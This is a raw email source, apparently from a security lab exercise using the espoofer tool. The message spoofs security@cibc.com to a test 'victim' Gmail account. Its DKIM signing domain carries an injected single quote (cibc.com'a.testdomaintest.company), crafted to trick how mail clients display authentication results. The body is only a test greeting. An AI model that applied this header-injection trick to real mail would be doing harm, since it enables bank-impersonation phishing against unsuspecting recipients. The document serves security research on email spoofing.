Original message
Message ID	<1538085644648.096e3d4e-bc38-4027-b57e-FP1SUM@message-ids.testdomaintest.company>
Created on:	26 November 2020 at 22:06 (Delivered after 7 seconds)
From:	security@cibc.com
To:	cis6510victim@gmail.com
Subject:	A4: DKIM authentication results injection using single quote
SPF:	SOFTFAIL with IP 24.114.69.81 Learn more
DKIM:	'FAIL' with domain cibc.com'a.testdomaintest.company Learn more
DMARC:	'FAIL' Learn more


Download original	Copy to clipboard	
Delivered-To: cis6510victim@gmail.com
Received: by 2002:a1f:27c5:0:0:0:0:0 with SMTP id n188csp1106651vkn;
        Thu, 26 Nov 2020 19:07:06 -0800 (PST)
X-Google-Smtp-Source: ABdhPJzHLHa6iM9tMOeWG7wpf06v7q4u0Txn/pPDWg5RYVsvjmqdl1yrR6Azl45cj2cBtgd4w4tc
X-Received: by 2002:a5d:4087:: with SMTP id o7mr7209084wrp.27.1606446426250;
        Thu, 26 Nov 2020 19:07:06 -0800 (PST)
ARC-Seal: i=1; a=rsa-sha256; t=1606446426; cv=none;
        d=google.com; s=arc-20160816;
        b=BBRIcuOcdM/alIspRZlLlB8xW1f623uYSz0EHkySLBle3jIqc0tKUvF11lnOvLZPEi
         vAOZ50048BLpZusc4i9ifSlx9YUXuTK3H0VJQEuulo3BJvMIKC8DvYJ8WiJ2gn+3klc3
         ZVkmb4rpromtzJFv97GDEucN6BZo4iVOrD9tmF6GKhTJcnzBhTjH82QXXe5BTpVFIIFU
         6fgzU4vsJgX0CC3dWyzlnkFm/HWDYVud+64EDq89teQp/pQ6MOkO7BbxwoB3+VlvW8Gm
         UXC1bMQyNzGjmgXAN3sOWQ6Y8xLkQA45E2u1mfAz+vfS/Gy+K9lMoApoKkAELoTf9Z9q
         xroA==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
        h=message-id:mime-version:date:subject:to:dkim-signature:from;
        bh=D4dKLoV2nbWSqjUdWgZ8Qj91haAqq0mxSF3sbZt3JBg=;
        b=b+jHkBCYygf/xket0PCJQpOaSwlTsvSY4cn64VkAqQ7Lllq55uwNU7az0nHtnvLjN9
         HBhh6bOsZAlb1qudON0x3AQuBjhC+bXgtUKCFmGyvMn/PHiiKwgudi3Bq6SWL+kzQKPn
         DMw0seurRRdnfzR7MeUmxhXEccwgVAKPFN5ZfUMx/PJodiXQipDBk+XI6uydlsOPCrvE
         vCLnpHshkv1i70HemW57B8N4S2fG5MqYtAgHIjgNizZ0uQyikuV6WYrosTyljehtSey6
         t9hpDgbyWJVfCJWybtSlYwpKiKuLtH5SOo0qcEi0cOOup1zjtJkWAMIBCRbh7c7H2i+R
         qXag==
ARC-Authentication-Results: i=1; mx.google.com;
       dkim=temperror (no key for signature) header.i=@cibc.com'a.testdomaintest.company header.s=dkim header.b=rzwpHZU6;
       spf=softfail (google.com: domain of transitioning any@testdomaintest.company does not designate 24.114.69.81 as permitted sender) smtp.mailfrom=any@testdomaintest.company;
       dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=cibc.com
Return-Path: <any@testdomaintest.company>
Received: from testdomaintest.company ([24.114.69.81])
        by mx.google.com with ESMTP id 63si7507255wrj.387.2020.11.26.19.07.02
        for <cis6510victim@gmail.com>;
        Thu, 26 Nov 2020 19:07:06 -0800 (PST)
Received-SPF: softfail (google.com: domain of transitioning any@testdomaintest.company does not designate 24.114.69.81 as permitted sender) client-ip=24.114.69.81;
Authentication-Results: mx.google.com;
       dkim=temperror (no key for signature) header.i=@cibc.com'a.testdomaintest.company header.s=dkim header.b=rzwpHZU6;
       spf=softfail (google.com: domain of transitioning any@testdomaintest.company does not designate 24.114.69.81 as permitted sender) smtp.mailfrom=any@testdomaintest.company;
       dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=cibc.com
From: <security@cibc.com>
DKIM-Signature: v=1; a=rsa-sha256; c=simple/relaxed; d=cibc.com'a.testdomaintest.company; i=@cibc.com'a.testdomaintest.company; q=dns/txt; s=dkim; t=1606446419; h=from; bh=D4dKLoV2nbWSqjUdWgZ8Qj91haAqq0mxSF3sbZt3JBg=; b=rzwpHZU6cR+IhuX3AyNM+BzqibD3yS+UgMtxQduGbPxvHI2P+FjyjYCAUqQjGBdt8fSJI o9Igem1feU+Au0ae3lpBTn42dAr/ghTAn+a+Lr20NWe3/XSu67s8E8ef0V0THYX94r5LCYl 5YFw2WZLxhaRuCYGx3CYJO86lr/Qli8=
To: <cis6510victim@gmail.com>
Subject: A4: DKIM authentication results injection using single quote
Date: Fri, 27 Nov 2020 03:06:59 +0000
Content-Type: multipart/alternative; boundary="001a113db9c28077e7054ee99e9c"
MIME-Version: 1.0
Message-ID: <1538085644648.096e3d4e-bc38-4027-b57e-FP1SUM@message-ids.testdomaintest.company>
X-Email-Client: https://github.com/chenjj/espoofer

--001a113db9c28077e7054ee99e9c

Hi, this is a test message! Best wishes.


--001a113db9c28077e7054ee99e9c--